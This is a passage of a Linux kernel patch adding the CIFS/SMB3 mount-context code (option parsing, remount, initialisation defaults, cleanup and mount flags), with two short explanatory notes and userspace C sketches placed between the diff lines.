++	struct cifs_sb_info *cifs_sb = CIFS_SB(root->d_sb);
++	int rc;
++
++	rc = smb3_verify_reconfigure_ctx(fc, ctx, cifs_sb->ctx);
++	if (rc)
++		return rc;
++
++	/*
++	 * We can not change UNC/username/password/domainname/
++	 * workstation_name/nodename/iocharset
++	 * during reconnect so ignore what we have in the new context and
++	 * just use what we already have in cifs_sb->ctx.
++	 */
++	STEAL_STRING(cifs_sb, ctx, UNC);
++	STEAL_STRING(cifs_sb, ctx, source);
++	STEAL_STRING(cifs_sb, ctx, username);
++	STEAL_STRING_SENSITIVE(cifs_sb, ctx, password);
++	STEAL_STRING(cifs_sb, ctx, domainname);
++	STEAL_STRING(cifs_sb, ctx, nodename);
++	STEAL_STRING(cifs_sb, ctx, iocharset);
++
++	/* if rsize or wsize not passed in on remount, use previous values */
++	if (ctx->rsize == 0)
++		ctx->rsize = cifs_sb->ctx->rsize;
++	if (ctx->wsize == 0)
++		ctx->wsize = cifs_sb->ctx->wsize;
++
++	smb3_cleanup_fs_context_contents(cifs_sb->ctx);
++	rc = smb3_fs_context_dup(cifs_sb->ctx, ctx);
++	smb3_update_mnt_flags(cifs_sb);
++#ifdef CONFIG_CIFS_DFS_UPCALL
++	if (!rc)
++		rc = dfs_cache_remount_fs(cifs_sb);
++#endif
++
++	return rc;
++}
++
++static int smb3_fs_context_parse_param(struct fs_context *fc,
++				      struct fs_parameter *param)
++{
++	struct fs_parse_result result;
++	struct smb3_fs_context *ctx = smb3_fc2context(fc);
++	int i, opt;
++	bool is_smb3 = !strcmp(fc->fs_type->name, "smb3");
++	bool skip_parsing = false;
++	kuid_t uid;
++	kgid_t gid;
++
++	cifs_dbg(FYI, "CIFS: parsing cifs mount option '%s'\n", param->key);
++
++	/*
++	 * fs_parse cannot handle string options with an empty value, so
++	 * we need to handle them specially.
++	 */
++	if (param->type == fs_value_is_string && param->string[0] == 0) {
++		if (!strcmp("pass", param->key) || !strcmp("password", param->key)) {
++			skip_parsing = true;
++			opt = Opt_pass;
++		} else if (!strcmp("user", param->key) || !strcmp("username", param->key)) {
++			skip_parsing = true;
++			opt = Opt_user;
++		}
++	}
++
++	if (!skip_parsing) {
++		opt = fs_parse(fc, smb3_fs_parameters, param, &result);
++		if (opt < 0)
++			return ctx->sloppy ? 1 : opt;
++	}
++
++	switch (opt) {
++	case Opt_compress:
++		ctx->compression = UNKNOWN_TYPE;
++		cifs_dbg(VFS,
++			"SMB3 compression support is experimental\n");
++		break;
++	case Opt_nodfs:
++		ctx->nodfs = 1;
++		break;
++	case Opt_hard:
++		if (result.negated)
++			ctx->retry = 0;
++		else
++			ctx->retry = 1;
++		break;
++	case Opt_soft:
++		if (result.negated)
++			ctx->retry = 1;
++		else
++			ctx->retry = 0;
++		break;
++	case Opt_mapposix:
++		if (result.negated)
++			ctx->remap = false;
++		else {
++			ctx->remap = true;
++			ctx->sfu_remap = false; /* disable SFU mapping */
++		}
++		break;
++	case Opt_mapchars:
++		if (result.negated)
++			ctx->sfu_remap = false;
++		else {
++			ctx->sfu_remap = true;
++			ctx->remap = false; /* disable SFM (mapposix) mapping */
++		}
++		break;
++	case Opt_user_xattr:
++		if (result.negated)
++			ctx->no_xattr = 1;
++		else
++			ctx->no_xattr = 0;
++		break;
++	case Opt_forceuid:
++		if (result.negated)
++			ctx->override_uid = 0;
++		else
++			ctx->override_uid = 1;
++		break;
++	case Opt_forcegid:
++		if (result.negated)
++			ctx->override_gid = 0;
++		else
++			ctx->override_gid = 1;
++		break;
++	case Opt_perm:
++		if (result.negated)
++			ctx->noperm = 1;
++		else
++			ctx->noperm = 0;
++		break;
++	case Opt_dynperm:
++		if (result.negated)
++			ctx->dynperm = 0;
++		else
++			ctx->dynperm = 1;
++		break;
++	case Opt_sfu:
++		if (result.negated)
++			ctx->sfu_emul = 0;
++		else
++			ctx->sfu_emul = 1;
++		break;
++	case Opt_noblocksend:
++		ctx->noblocksnd = 1;
++		break;
++	case Opt_noautotune:
++		ctx->noautotune = 1;
++		break;
++	case Opt_nolease:
++		ctx->no_lease = 1;
++		break;
++	case Opt_nosparse:
++		ctx->no_sparse = 1;
++		break;
++	case Opt_nodelete:
++		ctx->nodelete = 1;
++		break;
++	case Opt_multichannel:
++		if (result.negated) {
++			ctx->multichannel = false;
++			ctx->max_channels = 1;
++		} else {
++			ctx->multichannel = true;
++			/* if number of channels not specified, default to 2 */
++			if (ctx->max_channels < 2)
++				ctx->max_channels = 2;
++		}
++		break;
++	case Opt_uid:
++		uid = make_kuid(current_user_ns(), result.uint_32);
++		if (!uid_valid(uid))
++			goto cifs_parse_mount_err;
++		ctx->linux_uid = uid;
++		ctx->uid_specified = true;
++		break;
++	case Opt_cruid:
++		uid = make_kuid(current_user_ns(), result.uint_32);
++		if (!uid_valid(uid))
++			goto cifs_parse_mount_err;
++		ctx->cred_uid = uid;
++		ctx->cruid_specified = true;
++		break;
++	case Opt_backupuid:
++		uid = make_kuid(current_user_ns(), result.uint_32);
++		if (!uid_valid(uid))
++			goto cifs_parse_mount_err;
++		ctx->backupuid = uid;
++		ctx->backupuid_specified = true;
++		break;
++	case Opt_backupgid:
++		gid = make_kgid(current_user_ns(), result.uint_32);
++		if (!gid_valid(gid))
++			goto cifs_parse_mount_err;
++		ctx->backupgid = gid;
++		ctx->backupgid_specified = true;
++		break;
++	case Opt_gid:
++		gid = make_kgid(current_user_ns(), result.uint_32);
++		if (!gid_valid(gid))
++			goto cifs_parse_mount_err;
++		ctx->linux_gid = gid;
++		ctx->gid_specified = true;
++		break;
++	case Opt_port:
++		ctx->port = result.uint_32;
++		break;
++	case Opt_file_mode:
++		ctx->file_mode = result.uint_32;
++		break;
++	case Opt_dirmode:
++		ctx->dir_mode = result.uint_32;
++		break;
++	case Opt_min_enc_offload:
++		ctx->min_offload = result.uint_32;
++		break;
++	case Opt_blocksize:
++		/*
++		 * inode blocksize realistically should never need to be
++		 * less than 16K or greater than 16M and default is 1MB.
++		 * Note that small inode block sizes (e.g. 64K) can lead
++		 * to very poor performance of common tools like cp and scp
++		 */
++		if ((result.uint_32 < CIFS_MAX_MSGSIZE) ||
++		   (result.uint_32 > (4 * SMB3_DEFAULT_IOSIZE))) {
++			cifs_errorf(fc, "%s: Invalid blocksize\n",
++				__func__);
++			goto cifs_parse_mount_err;
++		}
++		ctx->bsize = result.uint_32;
++		ctx->got_bsize = true;
++		break;
++	case Opt_rasize:
++		/*
++		 * readahead size realistically should never need to be
++		 * less than 1M (CIFS_DEFAULT_IOSIZE) or greater than 32M
++		 * (perhaps an exception should be considered
++		 * for the case of a large number of channels
++		 * when multichannel is negotiated) since that would lead
++		 * to plenty of parallel I/O in flight to the server.
++		 * Note that smaller read ahead sizes would
++		 * hurt performance of common tools like cp and scp
++		 * which often trigger sequential i/o with read ahead
++		 */
++		if ((result.uint_32 > (8 * SMB3_DEFAULT_IOSIZE)) ||
++		    (result.uint_32 < CIFS_DEFAULT_IOSIZE)) {
++			cifs_errorf(fc, "%s: Invalid rasize %d vs. %d\n",
++				__func__, result.uint_32, SMB3_DEFAULT_IOSIZE);
++			goto cifs_parse_mount_err;
++		}
++		ctx->rasize = result.uint_32;
++		break;
++	case Opt_rsize:
++		ctx->rsize = result.uint_32;
++		ctx->got_rsize = true;
++		break;
++	case Opt_wsize:
++		ctx->wsize = result.uint_32;
++		ctx->got_wsize = true;
++		break;
++	case Opt_acregmax:
++		ctx->acregmax = HZ * result.uint_32;
++		if (ctx->acregmax > CIFS_MAX_ACTIMEO) {
++			cifs_errorf(fc, "acregmax too large\n");
++			goto cifs_parse_mount_err;
++		}
++		break;
++	case Opt_acdirmax:
++		ctx->acdirmax = HZ * result.uint_32;
++		if (ctx->acdirmax > CIFS_MAX_ACTIMEO) {
++			cifs_errorf(fc, "acdirmax too large\n");
++			goto cifs_parse_mount_err;
++		}
++		break;
++	case Opt_actimeo:
++		if (HZ * result.uint_32 > CIFS_MAX_ACTIMEO) {
++			cifs_errorf(fc, "timeout too large\n");
++			goto cifs_parse_mount_err;
++		}
++		if ((ctx->acdirmax != CIFS_DEF_ACTIMEO) ||
++		    (ctx->acregmax != CIFS_DEF_ACTIMEO)) {
++			cifs_errorf(fc, "actimeo ignored since acregmax or acdirmax specified\n");
++			break;
++		}
++		ctx->acdirmax = ctx->acregmax = HZ * result.uint_32;
++		break;
++	case Opt_closetimeo:
++		ctx->closetimeo = HZ * result.uint_32;
++		if (ctx->closetimeo > SMB3_MAX_DCLOSETIMEO) {
++			cifs_errorf(fc, "closetimeo too large\n");
++			goto cifs_parse_mount_err;
++		}
++		break;
++	case Opt_echo_interval:
++		ctx->echo_interval = result.uint_32;
++		break;
++	case Opt_snapshot:
++		ctx->snapshot_time = result.uint_64;
++		break;
++	case Opt_max_credits:
++		if (result.uint_32 < 20 || result.uint_32 > 60000) {
++			cifs_errorf(fc, "%s: Invalid max_credits value\n",
++				 __func__);
++			goto cifs_parse_mount_err;
++		}
++		ctx->max_credits = result.uint_32;
++		break;
++	case Opt_max_channels:
++		if (result.uint_32 < 1 || result.uint_32 > CIFS_MAX_CHANNELS) {
++			cifs_errorf(fc, "%s: Invalid max_channels value, needs to be 1-%d\n",
++				 __func__, CIFS_MAX_CHANNELS);
++			goto cifs_parse_mount_err;
++		}
++		ctx->max_channels = result.uint_32;
++		/* If more than one channel requested ... they want multichan */
++		if (result.uint_32 > 1)
++			ctx->multichannel = true;
++		break;
++	case Opt_handletimeout:
++		ctx->handle_timeout = result.uint_32;
++		if (ctx->handle_timeout > SMB3_MAX_HANDLE_TIMEOUT) {
++			cifs_errorf(fc, "Invalid handle cache timeout, longer than 16 minutes\n");
++			goto cifs_parse_mount_err;
++		}
++		break;
++	case Opt_source:
++		kfree(ctx->UNC);
++		ctx->UNC = NULL;
++		switch (smb3_parse_devname(param->string, ctx)) {
++		case 0:
++			break;
++		case -ENOMEM:
++			cifs_errorf(fc, "Unable to allocate memory for devname\n");
++			goto cifs_parse_mount_err;
++		case -EINVAL:
++			cifs_errorf(fc, "Malformed UNC in devname\n");
++			goto cifs_parse_mount_err;
++		default:
++			cifs_errorf(fc, "Unknown error parsing devname\n");
++			goto cifs_parse_mount_err;
++		}
++		ctx->source = kstrdup(param->string, GFP_KERNEL);
++		if (ctx->source == NULL) {
++			cifs_errorf(fc, "OOM when copying UNC string\n");
++			goto cifs_parse_mount_err;
++		}
++		fc->source = kstrdup(param->string, GFP_KERNEL);
++		if (fc->source == NULL) {
++			cifs_errorf(fc, "OOM when copying UNC string\n");
++			goto cifs_parse_mount_err;
++		}
++		break;
++	case Opt_user:
++		kfree(ctx->username);
++		ctx->username = NULL;
++		if (strlen(param->string) == 0) {
++			/* null user, ie. anonymous authentication */
++			ctx->nullauth = 1;
++			break;
++		}
++
++		if (strnlen(param->string, CIFS_MAX_USERNAME_LEN) >
++		    CIFS_MAX_USERNAME_LEN) {
++			pr_warn("username too long\n");
++			goto cifs_parse_mount_err;
++		}
++		ctx->username = kstrdup(param->string, GFP_KERNEL);
++		if (ctx->username == NULL) {
++			cifs_errorf(fc, "OOM when copying username string\n");
++			goto cifs_parse_mount_err;
++		}
++		break;
++	case Opt_pass:
++		kfree_sensitive(ctx->password);
++		ctx->password = NULL;
++		if (strlen(param->string) == 0)
++			break;
++
++		ctx->password = kstrdup(param->string, GFP_KERNEL);
++		if (ctx->password == NULL) {
++			cifs_errorf(fc, "OOM when copying password string\n");
++			goto cifs_parse_mount_err;
++		}
++		break;
++	case Opt_ip:
++		if (strlen(param->string) == 0) {
++			ctx->got_ip = false;
++			break;
++		}
++		if (!cifs_convert_address((struct sockaddr *)&ctx->dstaddr,
++					  param->string,
++					  strlen(param->string))) {
++			pr_err("bad ip= option (%s)\n", param->string);
++			goto cifs_parse_mount_err;
++		}
++		ctx->got_ip = true;
++		break;
++	case Opt_domain:
++		if (strnlen(param->string, CIFS_MAX_DOMAINNAME_LEN)
++				== CIFS_MAX_DOMAINNAME_LEN) {
++			pr_warn("domain name too long\n");
++			goto cifs_parse_mount_err;
++		}
++
++		kfree(ctx->domainname);
++		ctx->domainname = kstrdup(param->string, GFP_KERNEL);
++		if (ctx->domainname == NULL) {
++			cifs_errorf(fc, "OOM when copying domainname string\n");
++			goto cifs_parse_mount_err;
++		}
++		cifs_dbg(FYI, "Domain name set\n");
++		break;
++	case Opt_srcaddr:
++		if (!cifs_convert_address(
++				(struct sockaddr *)&ctx->srcaddr,
++				param->string, strlen(param->string))) {
++			pr_warn("Could not parse srcaddr: %s\n",
++				param->string);
++			goto cifs_parse_mount_err;
++		}
++		break;
++	case Opt_iocharset:
++		if (strnlen(param->string, 1024) >= 65) {
++			pr_warn("iocharset name too long\n");
++			goto cifs_parse_mount_err;
++		}
++
++		if (strncasecmp(param->string, "default", 7) != 0) {
++			kfree(ctx->iocharset);
++			ctx->iocharset = kstrdup(param->string, GFP_KERNEL);
++			if (ctx->iocharset == NULL) {
++				cifs_errorf(fc, "OOM when copying iocharset string\n");
++				goto cifs_parse_mount_err;
++			}
++		}
++		/* if iocharset not set then load_nls_default
++		 * is used by caller
++		 */
++		cifs_dbg(FYI, "iocharset set to %s\n", ctx->iocharset);
++		break;
++	case Opt_netbiosname:
++		memset(ctx->source_rfc1001_name, 0x20,
++			RFC1001_NAME_LEN);
++		/*
++		 * FIXME: are there cases in which a comma can
++		 * be valid in workstation netbios name (and
++		 * need special handling)?
++		 */
++		for (i = 0; i < RFC1001_NAME_LEN; i++) {
++			/* don't ucase netbiosname for user */
++			if (param->string[i] == 0)
++				break;
++			ctx->source_rfc1001_name[i] = param->string[i];
++		}
++		/* The 16th byte of the string is still zero from the
++		 * memset at the top of the function
++		 */
++		if (i == RFC1001_NAME_LEN && param->string[i] != 0)
++			pr_warn("netbiosname longer than 15 truncated\n");
++		break;
++	case Opt_servern:
++		/* last byte, type, is 0x20 for server type */
++		memset(ctx->target_rfc1001_name, 0x20,
++			RFC1001_NAME_LEN_WITH_NULL);
++		/*
++		 * BB are there cases in which a comma can be valid in this
++		 * workstation netbios name (and need special handling)?
++		 */
++
++		/* user or mount helper must uppercase the netbios name */
++		for (i = 0; i < 15; i++) {
++			if (param->string[i] == 0)
++				break;
++			ctx->target_rfc1001_name[i] = param->string[i];
++		}
++
++		/* The 16th byte of the string is still zero from the memset at the top of the function */
++		if (i == RFC1001_NAME_LEN && param->string[i] != 0)
++			pr_warn("server netbiosname longer than 15 truncated\n");
++		break;
++	case Opt_ver:
++		/* version of mount userspace tools, not dialect */
++		/* If interface changes in mount.cifs bump to new ver */
++		if (strncasecmp(param->string, "1", 1) == 0) {
++			if (strlen(param->string) > 1) {
++				pr_warn("Bad mount helper ver=%s. Did you want SMB1 (CIFS) dialect and mean to type vers=1.0 instead?\n",
++					param->string);
++				goto cifs_parse_mount_err;
++			}
++			/* This is the default */
++			break;
++		}
++		/* For all other values, error */
++		pr_warn("Invalid mount helper version specified\n");
++		goto cifs_parse_mount_err;
++	case Opt_vers:
++		/* protocol version (dialect) */
++		if (cifs_parse_smb_version(fc, param->string, ctx, is_smb3) != 0)
++			goto cifs_parse_mount_err;
++		ctx->got_version = true;
++		break;
++	case Opt_sec:
++		if (cifs_parse_security_flavors(fc, param->string, ctx) != 0)
++			goto cifs_parse_mount_err;
++		break;
++	case Opt_cache:
++		if (cifs_parse_cache_flavor(fc, param->string, ctx) != 0)
++			goto cifs_parse_mount_err;
++		break;
++	case Opt_witness:
++#ifndef CONFIG_CIFS_SWN_UPCALL
++		cifs_errorf(fc, "Witness support needs CONFIG_CIFS_SWN_UPCALL config option\n");
++		goto cifs_parse_mount_err;
++#endif
++		ctx->witness = true;
++		pr_warn_once("Witness protocol support is experimental\n");
++		break;
++	case Opt_rootfs:
++#ifndef CONFIG_CIFS_ROOT
++		cifs_dbg(VFS, "rootfs support requires CONFIG_CIFS_ROOT config option\n");
++		goto cifs_parse_mount_err;
++#endif
++		ctx->rootfs = true;
++		break;
++	case Opt_posixpaths:
++		if (result.negated)
++			ctx->posix_paths = 0;
++		else
++			ctx->posix_paths = 1;
++		break;
++	case Opt_unix:
++		if (result.negated) {
++			if (ctx->linux_ext == 1)
++				pr_warn_once("conflicting posix mount options specified\n");
++			ctx->linux_ext = 0;
++			ctx->no_linux_ext = 1;
++		} else {
++			if (ctx->no_linux_ext == 1)
++				pr_warn_once("conflicting posix mount options specified\n");
++			ctx->linux_ext = 1;
++			ctx->no_linux_ext = 0;
++		}
++		break;
++	case Opt_nocase:
++		ctx->nocase = 1;
++		break;
++	case Opt_brl:
++		if (result.negated) {
++			/*
++			 * turn off mandatory locking in mode
++			 * if remote locking is turned off since the
++			 * local vfs will do advisory
++			 */
++			if (ctx->file_mode ==
++				(S_IALLUGO & ~(S_ISUID | S_IXGRP)))
++				ctx->file_mode = S_IALLUGO;
++			ctx->nobrl =  1;
++		} else
++			ctx->nobrl =  0;
++		break;
++	case Opt_handlecache:
++		if (result.negated)
++			ctx->nohandlecache = 1;
++		else
++			ctx->nohandlecache = 0;
++		break;
++	case Opt_forcemandatorylock:
++		ctx->mand_lock = 1;
++		break;
++	case Opt_setuids:
++		ctx->setuids = result.negated;
++		break;
++	case Opt_intr:
++		ctx->intr = !result.negated;
++		break;
++	case Opt_setuidfromacl:
++		ctx->setuidfromacl = 1;
++		break;
++	case Opt_strictsync:
++		ctx->nostrictsync = result.negated;
++		break;
++	case Opt_serverino:
++		ctx->server_ino = !result.negated;
++		break;
++	case Opt_rwpidforward:
++		ctx->rwpidforward = 1;
++		break;
++	case Opt_modesid:
++		ctx->mode_ace = 1;
++		break;
++	case Opt_cifsacl:
++		ctx->cifs_acl = !result.negated;
++		break;
++	case Opt_acl:
++		ctx->no_psx_acl = result.negated;
++		break;
++	case Opt_locallease:
++		ctx->local_lease = 1;
++		break;
++	case Opt_sign:
++		ctx->sign = true;
++		break;
++	case Opt_ignore_signature:
++		ctx->sign = true;
++		ctx->ignore_signature = true;
++		break;
++	case Opt_seal:
++		/* we do not do the following in secFlags because seal
++		 * is a per tree connection (mount) not a per socket
++		 * or per-smb connection option in the protocol
++		 * vol->secFlg |= CIFSSEC_MUST_SEAL;
++		 */
++		ctx->seal = 1;
++		break;
++	case Opt_noac:
++		pr_warn("Mount option noac not supported. Instead set /proc/fs/cifs/LookupCacheEnabled to 0\n");
++		break;
++	case Opt_fsc:
++#ifndef CONFIG_CIFS_FSCACHE
++		cifs_errorf(fc, "FS-Cache support needs CONFIG_CIFS_FSCACHE kernel config option set\n");
++		goto cifs_parse_mount_err;
++#endif
++		ctx->fsc = true;
++		break;
++	case Opt_mfsymlinks:
++		ctx->mfsymlinks = true;
++		break;
++	case Opt_multiuser:
++		ctx->multiuser = true;
++		break;
++	case Opt_sloppy:
++		ctx->sloppy = true;
++		break;
++	case Opt_nosharesock:
++		ctx->nosharesock = true;
++		break;
++	case Opt_persistent:
++		if (result.negated) {
++			ctx->nopersistent = true;
++			if (ctx->persistent) {
++				cifs_errorf(fc, "persistenthandles mount options conflict\n");
++				goto cifs_parse_mount_err;
++			}
++		} else {
++			ctx->persistent = true;
++			if ((ctx->nopersistent) || (ctx->resilient)) {
++				cifs_errorf(fc, "persistenthandles mount options conflict\n");
++				goto cifs_parse_mount_err;
++			}
++		}
++		break;
++	case Opt_resilient:
++		if (result.negated) {
++			ctx->resilient = false; /* already the default */
++		} else {
++			ctx->resilient = true;
++			if (ctx->persistent) {
++				cifs_errorf(fc, "persistenthandles mount options conflict\n");
++				goto cifs_parse_mount_err;
++			}
++		}
++		break;
++	case Opt_tcp_nodelay:
++		/* tcp nodelay should not usually be needed since we CORK/UNCORK the socket */
++		if (result.negated)
++			ctx->sockopt_tcp_nodelay = false;
++		else
++			ctx->sockopt_tcp_nodelay = true;
++		break;
++	case Opt_domainauto:
++		ctx->domainauto = true;
++		break;
++	case Opt_rdma:
++		ctx->rdma = true;
++		break;
++	}
++	/* case Opt_ignore: - is ignored as expected ... */
++
++	return 0;
++
++ cifs_parse_mount_err:
++	kfree_sensitive(ctx->password);
++	return -EINVAL;
++}
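Worth noting about the error path above: every parse failure funnels through the single cifs_parse_mount_err label, which scrubs the password with kfree_sensitive() so a half-parsed mount request never leaves the secret behind in freed memory. A minimal userspace sketch of the same single-exit, scrub-on-error shape (names are hypothetical; the plain memset() is only illustrative, since optimizing compilers may elide it where the kernel's kfree_sensitive() cannot):

  #include <stdlib.h>
  #include <string.h>

  static void free_sensitive(char *p)
  {
          if (!p)
                  return;
          memset(p, 0, strlen(p));     /* scrub before free (illustrative) */
          free(p);
  }

  static int parse_opt(const char *opt, char **password)
  {
          if (strncmp(opt, "pass=", 5) != 0)
                  goto parse_err;      /* single exit path, as above */
          *password = strdup(opt + 5);
          return *password ? 0 : -1;

  parse_err:
          free_sensitive(*password);   /* never leak the secret on error */
          *password = NULL;
          return -1;
  }

  int main(void)
  {
          char *pw = NULL;

          parse_opt("pass=s3cret", &pw);   /* ok */
          parse_opt("vers=3.0", &pw);      /* error path scrubs pw */
          return pw == NULL ? 0 : 1;
  }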
++
++int smb3_init_fs_context(struct fs_context *fc)
++{
++	struct smb3_fs_context *ctx;
++	char *nodename = utsname()->nodename;
++	int i;
++
++	ctx = kzalloc(sizeof(struct smb3_fs_context), GFP_KERNEL);
++	if (unlikely(!ctx))
++		return -ENOMEM;
++
++	strscpy(ctx->workstation_name, nodename, sizeof(ctx->workstation_name));
++
++	/*
++	 * does not have to be perfect mapping since field is
++	 * informational, only used for servers that do not support
++	 * port 445 and it can be overridden at mount time
++	 */
++	memset(ctx->source_rfc1001_name, 0x20, RFC1001_NAME_LEN);
++	for (i = 0; i < strnlen(nodename, RFC1001_NAME_LEN); i++)
++		ctx->source_rfc1001_name[i] = toupper(nodename[i]);
++
++	ctx->source_rfc1001_name[RFC1001_NAME_LEN] = 0;
++	/*
++	 * null target name indicates to use *SMBSERVR default called name
++	 *  if we end up sending RFC1001 session initialize
++	 */
++	ctx->target_rfc1001_name[0] = 0;
++	ctx->cred_uid = current_uid();
++	ctx->linux_uid = current_uid();
++	ctx->linux_gid = current_gid();
++	/* By default 4MB read ahead size, 1MB block size */
++	ctx->bsize = CIFS_DEFAULT_IOSIZE; /* can improve cp performance significantly */
++	ctx->rasize = 0; /* 0 = use default (ie negotiated rsize) for read ahead pages */
++
++	/*
++	 * default to SFM style remapping of seven reserved characters
++	 * unless the user overrides it or we negotiate CIFS POSIX, where
++	 * it is unnecessary.  Cannot simultaneously use more than one mapping
++	 * since then readdir could list files that open could not open
++	 */
++	ctx->remap = true;
++
++	/* default to only allowing write access to owner of the mount */
++	ctx->dir_mode = ctx->file_mode = S_IRUGO | S_IXUGO | S_IWUSR;
++
++	/* ctx->retry default is 0 (i.e. "soft" limited retry not hard retry) */
++	/* default is always to request posix paths. */
++	ctx->posix_paths = 1;
++	/* default to using server inode numbers where available */
++	ctx->server_ino = 1;
++
++	/* default is to use strict cifs caching semantics */
++	ctx->strict_io = true;
++
++	ctx->acregmax = CIFS_DEF_ACTIMEO;
++	ctx->acdirmax = CIFS_DEF_ACTIMEO;
++	ctx->closetimeo = SMB3_DEF_DCLOSETIMEO;
++
++	/* Most clients set timeout to 0, allows server to use its default */
++	ctx->handle_timeout = 0; /* See MS-SMB2 spec section 2.2.14.2.12 */
++
++	/* offer SMB2.1 and later (SMB3 etc). Secure and widely accepted */
++	ctx->ops = &smb30_operations;
++	ctx->vals = &smbdefault_values;
++
++	ctx->echo_interval = SMB_ECHO_INTERVAL_DEFAULT;
++
++	/* default to no multichannel (single server connection) */
++	ctx->multichannel = false;
++	ctx->max_channels = 1;
++
++	ctx->backupuid_specified = false; /* no backup intent for a user */
++	ctx->backupgid_specified = false; /* no backup intent for a group */
++
++/*
++ *	short int override_uid = -1;
++ *	short int override_gid = -1;
++ *	char *nodename = strdup(utsname()->nodename);
++ *	struct sockaddr *dstaddr = (struct sockaddr *)&vol->dstaddr;
++ */
++
++	fc->fs_private = ctx;
++	fc->ops = &smb3_fs_context_ops;
++	return 0;
++}
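The RFC1001 name setup above is compact: the local nodename is uppercased into a field pre-filled with spaces (the RFC 1001 padding character) and truncated at RFC1001_NAME_LEN. A standalone sketch of that derivation, assuming the 15-byte name length and a hypothetical hostname:

  #include <ctype.h>
  #include <stdio.h>
  #include <string.h>

  #define RFC1001_NAME_LEN 15

  int main(void)
  {
          const char *nodename = "workstation-01.example";  /* hypothetical */
          char nb[RFC1001_NAME_LEN + 1];
          size_t i, n = strnlen(nodename, RFC1001_NAME_LEN);

          memset(nb, ' ', RFC1001_NAME_LEN);   /* space padding, per RFC 1001 */
          for (i = 0; i < n; i++)
                  nb[i] = toupper((unsigned char)nodename[i]);
          nb[RFC1001_NAME_LEN] = '\0';         /* NUL one byte past the field */

          printf("\"%s\"\n", nb);   /* "WORKSTATION-01." (truncated at 15) */
          return 0;
  }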
++
++void
++smb3_cleanup_fs_context_contents(struct smb3_fs_context *ctx)
++{
++	if (ctx == NULL)
++		return;
++
++	/*
++	 * Make sure this stays in sync with smb3_fs_context_dup()
++	 */
++	kfree(ctx->mount_options);
++	ctx->mount_options = NULL;
++	kfree(ctx->username);
++	ctx->username = NULL;
++	kfree_sensitive(ctx->password);
++	ctx->password = NULL;
++	kfree(ctx->server_hostname);
++	ctx->server_hostname = NULL;
++	kfree(ctx->UNC);
++	ctx->UNC = NULL;
++	kfree(ctx->source);
++	ctx->source = NULL;
++	kfree(ctx->domainname);
++	ctx->domainname = NULL;
++	kfree(ctx->nodename);
++	ctx->nodename = NULL;
++	kfree(ctx->iocharset);
++	ctx->iocharset = NULL;
++	kfree(ctx->prepath);
++	ctx->prepath = NULL;
++}
++
++void
++smb3_cleanup_fs_context(struct smb3_fs_context *ctx)
++{
++	if (!ctx)
++		return;
++	smb3_cleanup_fs_context_contents(ctx);
++	kfree(ctx);
++}
++
++void smb3_update_mnt_flags(struct cifs_sb_info *cifs_sb)
++{
++	struct smb3_fs_context *ctx = cifs_sb->ctx;
++
++	if (ctx->nodfs)
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_NO_DFS;
++	else
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_NO_DFS;
++
++	if (ctx->noperm)
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_NO_PERM;
++	else
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_NO_PERM;
++
++	if (ctx->setuids)
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_SET_UID;
++	else
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_SET_UID;
++
++	if (ctx->setuidfromacl)
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_UID_FROM_ACL;
++	else
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_UID_FROM_ACL;
++
++	if (ctx->server_ino)
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_SERVER_INUM;
++	else
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_SERVER_INUM;
++
++	if (ctx->remap)
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_MAP_SFM_CHR;
++	else
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_MAP_SFM_CHR;
++
++	if (ctx->sfu_remap)
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_MAP_SPECIAL_CHR;
++	else
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_MAP_SPECIAL_CHR;
++
++	if (ctx->no_xattr)
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_NO_XATTR;
++	else
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_NO_XATTR;
++
++	if (ctx->sfu_emul)
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_UNX_EMUL;
++	else
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_UNX_EMUL;
++
++	if (ctx->nobrl)
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_NO_BRL;
++	else
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_NO_BRL;
++
++	if (ctx->nohandlecache)
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_NO_HANDLE_CACHE;
++	else
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_NO_HANDLE_CACHE;
++
++	if (ctx->nostrictsync)
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_NOSSYNC;
++	else
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_NOSSYNC;
++
++	if (ctx->mand_lock)
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_NOPOSIXBRL;
++	else
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_NOPOSIXBRL;
++
++	if (ctx->rwpidforward)
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_RWPIDFORWARD;
++	else
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_RWPIDFORWARD;
++
++	if (ctx->mode_ace)
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_MODE_FROM_SID;
++	else
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_MODE_FROM_SID;
++
++	if (ctx->cifs_acl)
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_CIFS_ACL;
++	else
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_CIFS_ACL;
++
++	if (ctx->backupuid_specified)
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_CIFS_BACKUPUID;
++	else
++		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_CIFS_BACKUPUID;
++
++	if (ctx->backupgid_specified)
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_CIFS_BACKUPGID;
++	else
